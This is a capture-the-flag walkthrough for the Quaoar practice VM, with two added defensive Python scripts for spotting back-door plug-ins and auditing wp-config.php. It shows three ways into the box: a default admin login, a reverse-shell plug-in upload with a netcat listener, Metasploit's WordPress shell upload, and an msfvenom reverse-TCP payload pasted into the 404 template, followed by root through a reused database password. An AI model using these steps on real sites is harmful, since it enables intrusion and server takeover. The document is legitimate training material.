Hackfest 2016 - Quaoar VM Walkthrough / Writeup

Vulnhub.com - Quaoar VM Walkthrough
Three Different Techniques to Exploit a Machine

This VM was made for Hackfest 2016 and is listed as very easy. I had it done in under two hours using three different techniques.


Welcome to Quaoar. This is a vulnerable machine which is created for http://hackfest.ca/

Difficulty : Very Easy
Tips:
Here are the tools you can research to help you to own this machine: nmap, dirb / dirbuster / BurpSmartBuster, nikto, wpscan, hydra, your brain, coffee, Google :)
Goals: This machine is intended to be doable by someone who is interested in learning computer security. There are 3 flags on this machine:
1. Get a shell
2. Get root access
3. There is a post exploitation flag on the box


Different Techniques to Exploit :
  • Reverse Shell Plugin Upload
  • Metasploit Wordpress Exploit Payload
  • Payload post in 404 page

Starting with the 1st technique:
  • Reverse Shell Plugin Upload
Let's get started with old faithful, arp-scan, to find the VM's network location.
Command : arp-scan -l

Network scan with the arp-scan tool

Followed by the obligatory nmap scan; there is a lot of interesting stuff going on here…
Command : nmap -p- (ip)

Scan of the IP with nmap

Although there was lots to see, I went straight for port 80 because of the self-proclaimed 'very easy' difficulty and fired up nikto. Immediately I can see this is a WordPress install.
Command : nikto -h (ip)
Nikto scan of port 80
So, firing up WPScan and enumerating usernames, we get the default admin entry.
Command : wpscan --url www.example.com --enumerate u
Where there is a default admin entry there is very likely to be a default admin password (admin:admin). I didn't even look at the landing page at this point, going directly to /wordpress/wp-login.php and trying out my theory.

WordPress login with default credentials

And as you can see, we get straight into the WordPress portal.

Finally, admin page access

At this stage I decided to create a WordPress plug-in that I could use to generate a reverse shell. I took the out-of-the-box PHP back door shipped with Kali (/usr/share/webshells/php/php-reverse-shell.php) and made the following amendments to it…
Change the IP (your local IP) and port in the reverse shell PHP, then zip the updated file.

Updating the IP and port in the reverse shell

The plug-in headers are required so that, when you zip the PHP file and upload it, WordPress recognises it as a plug-in and installs it. You can see rev.zip in the screen grab below.

Upload the zip file and click Install

If you go to Installed Plugins after this, you will see it has actually been installed under the plug-in name from the header. Great for obfuscating your back door.

Check on the Plugins page: it shows up under the name "pwn"
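From the defender's side, the same header trick is what makes a back-door plug-in blend in on the Plugins page: a valid `Plugin Name:` header plus a body that opens a socket and runs commands. The following detector is an added example written for this writeup, not code from the VM or from any WordPress project; it walks a plugins directory, reads each PHP file's plugin header, and flags files that combine a network primitive with a command-execution primitive. The two sample plug-ins it writes into a temporary directory are constructed for the demonstration (the "pwn" one only contains the two indicative calls, not a working shell).

```python
"""Flag WordPress plug-in files that pair a socket call with command execution.
Added example for the Quaoar writeup; the sample plug-ins below are constructed."""
import os
import re
import tempfile

# Primitives that rarely belong together in a small, legitimate plug-in.
NETWORK_FUNCS = ("fsockopen", "socket_create", "stream_socket_client")
EXEC_FUNCS = ("exec", "shell_exec", "system", "passthru", "proc_open", "popen")

# Matches both "Plugin Name: x" and " * Plugin Name: x" header styles.
HEADER_RE = re.compile(r"^\s*\*?\s*Plugin Name:\s*(.+)$", re.MULTILINE)


def _calls(code, names):
    """Return the subset of `names` that appear as function calls in `code`.
    The \\b keeps 'exec' from matching inside 'shell_exec' or 'execute'."""
    return sorted({n for n in names if re.search(r"\b" + n + r"\s*\(", code)})


def scan_plugin_file(path):
    """Return a finding dict for one PHP file, or None if nothing suspicious."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        code = fh.read()
    m = HEADER_RE.search(code)
    plugin_name = m.group(1).strip() if m else None
    net = _calls(code, NETWORK_FUNCS)
    ex = _calls(code, EXEC_FUNCS)
    if net and ex:
        return {"path": path, "plugin_name": plugin_name,
                "network": net, "exec": ex,
                "reason": "opens a socket and executes commands"}
    return None


def scan_plugins_dir(root):
    """Walk wp-content/plugins (or any directory) and collect findings."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                hit = scan_plugin_file(os.path.join(dirpath, name))
                if hit:
                    findings.append(hit)
    return findings


def make_sample_plugins():
    """Write one benign and one suspicious (constructed, non-functional) plug-in
    into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="wp-plugins-")
    benign = os.path.join(root, "hello-banner")
    bad = os.path.join(root, "pwn")
    os.makedirs(benign)
    os.makedirs(bad)
    with open(os.path.join(benign, "hello-banner.php"), "w") as fh:
        fh.write("<?php\n/*\nPlugin Name: Hello World Banner\n*/\n"
                 "add_action('wp_footer', function () { echo '<p>Hello</p>'; });\n")
    with open(os.path.join(bad, "pwn.php"), "w") as fh:
        # Constructed fragment: only the two calls a detector keys on, nothing more.
        fh.write("<?php\n/*\nPlugin Name: pwn\n*/\n"
                 "$sock = fsockopen($host, $port, $errno, $errstr, 30);\n"
                 "$out = shell_exec($cmd);\n")
    return root


if __name__ == "__main__":
    for hit in scan_plugins_dir(make_sample_plugins()):
        print(f"{hit['plugin_name']!r} at {hit['path']}: {hit['reason']} "
              f"(network={hit['network']}, exec={hit['exec']})")
```

Run it against a real `wp-content/plugins` directory instead of the sample tree to get the same report; a hit is worth a look even when the Plugins page shows an innocuous name, because the name comes from the header the uploader wrote.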
Start netcat in listen mode on the port you set in the shell (4444 here).
Command : nc -nlvvp 4444
Activate the plug-in from the Plugins page and catch the connection with the netcat listener.
Wow :) Session created
A recursive lookup through the /home directories and we find our first flag.
Got First Flag :)
Now, I started this post by saying it had many similarities to Stapler; one of these similarities is the wp-config.php file containing MySQL credentials. The thing with these creds is that they are not just the MySQL password but the actual root password.

SQL credentials taken from the wp-config file

So, assuming the credentials are shared between the two accounts:
Try su root with the database password and we are in as root. There is a flag in /root/, and we already had the other.
Command : su root
Grab the second flag
And for the last flag, check the PHP cron file.
Location : cd /etc/cron.d/
Command : cat php5
Finally got the third flag :)
2nd Technique :

  • Metasploit WordPress Payload Exploit
Using the admin username, I was able to access the WordPress admin dashboard with the password 'admin'.
From here, it was then possible to get a reverse shell using Metasploit (exploit/unix/webapp/wp_admin_shell_upload).

Command : use exploit/unix/webapp/wp_admin_shell_upload
Command : show options

Reverse shell upload using the Metasploit WordPress exploit

Finally Session created
Once the session is created, follow the steps above to get the flags :)


3rd Technique :

  • Reverse TCP Payload posted in the 404 page
I created a PHP file with the Meterpreter payload, as shown in the following image:
Command : msfvenom -p php/meterpreter/reverse_tcp LHOST=[ip] LPORT=[PORT] -f raw > shell.php

Creating the PHP shell payload


Copy the PHP shell code

Then I added the shell code to the theme's 404 template using the WordPress theme editor.
WordPress Admin > Appearance > Editor > Template

Paste the PHP shell code into the template
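All three techniques on this box go through settings that WordPress lets an administrator turn off in wp-config.php: the theme editor used here is disabled by DISALLOW_FILE_EDIT, and dashboard plug-in uploads (techniques 1 and 2) are disabled by DISALLOW_FILE_MODS; the root escalation only worked because the database password in wp-config.php was reused for a system account. The audit script below is an added example written for this writeup, not code from the VM or from WordPress; it parses the define() calls in a wp-config.php and reports which of those protections are missing. Both config texts are constructed samples, not the VM's real file, and the password in the hardened one is made up.

```python
"""Audit a wp-config.php for the hardening settings relevant to this box.
Added example for the Quaoar writeup; both config samples are constructed."""
import re

# Captures define('KEY', value) where value is true/false or a quoted string.
DEFINE_RE = re.compile(
    r"""define\(\s*['"]([A-Za-z_]+)['"]\s*,\s*(true|false|'[^']*'|"[^"]*")\s*\)""",
    re.IGNORECASE,
)

# Constructed sample resembling a stock install: editor and plug-in installs
# allowed, WordPress talking to MySQL as root with a short password.
WEAK_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'rootpassword!');
define('DB_HOST', 'localhost');
"""

# Constructed hardened sample: dedicated DB account, long unique password,
# dashboard file editing and plug-in installation switched off.
HARDENED_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wp_app');
define('DB_PASSWORD', 'Q7v!pL2#xR9sT4wZ');
define('DB_HOST', 'localhost');
define('DISALLOW_FILE_EDIT', true);
define('DISALLOW_FILE_MODS', true);
"""


def parse_defines(text):
    """Return {CONSTANT: value} for the define() calls in a wp-config.php."""
    out = {}
    for key, raw in DEFINE_RE.findall(text):
        if raw.lower() == "true":
            out[key] = True
        elif raw.lower() == "false":
            out[key] = False
        else:
            out[key] = raw[1:-1]  # strip the surrounding quotes
    return out


def audit_wp_config(text):
    """Return a list of (constant, problem) tuples; an empty list means all checks passed."""
    cfg = parse_defines(text)
    issues = []
    if cfg.get("DISALLOW_FILE_EDIT") is not True:
        issues.append(("DISALLOW_FILE_EDIT",
                       "theme/plugin file editor is enabled, so any admin session "
                       "can write PHP into templates such as 404.php"))
    if cfg.get("DISALLOW_FILE_MODS") is not True:
        issues.append(("DISALLOW_FILE_MODS",
                       "plug-in upload/installation from the dashboard is allowed"))
    if str(cfg.get("DB_USER", "")).lower() == "root":
        issues.append(("DB_USER",
                       "WordPress connects to MySQL as root; use a dedicated "
                       "low-privilege database account"))
    if len(str(cfg.get("DB_PASSWORD", ""))) < 16:
        issues.append(("DB_PASSWORD",
                       "database password is short; it must also be unique to the "
                       "database and never reused for a system account such as root"))
    return issues


if __name__ == "__main__":
    for label, cfg_text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"== {label} ==")
        for key, problem in audit_wp_config(cfg_text) or [("OK", "no findings")]:
            print(f"  {key}: {problem}")
```

Read the real file with `audit_wp_config(open('wp-config.php').read())` to run the same checks; note that DISALLOW_FILE_MODS also hides the editor, so a site with only that constant set still passes the file-edit check in spirit even though this script reports both separately.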
I started msfconsole and set up the listener.
Command :
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
Once that was set up, I just forced a 404 error on WordPress by fetching a nonexistent post ID.
Yupieee :) I got a shell to the server
So now follow the 1st technique to grab the flags :)
Job done.
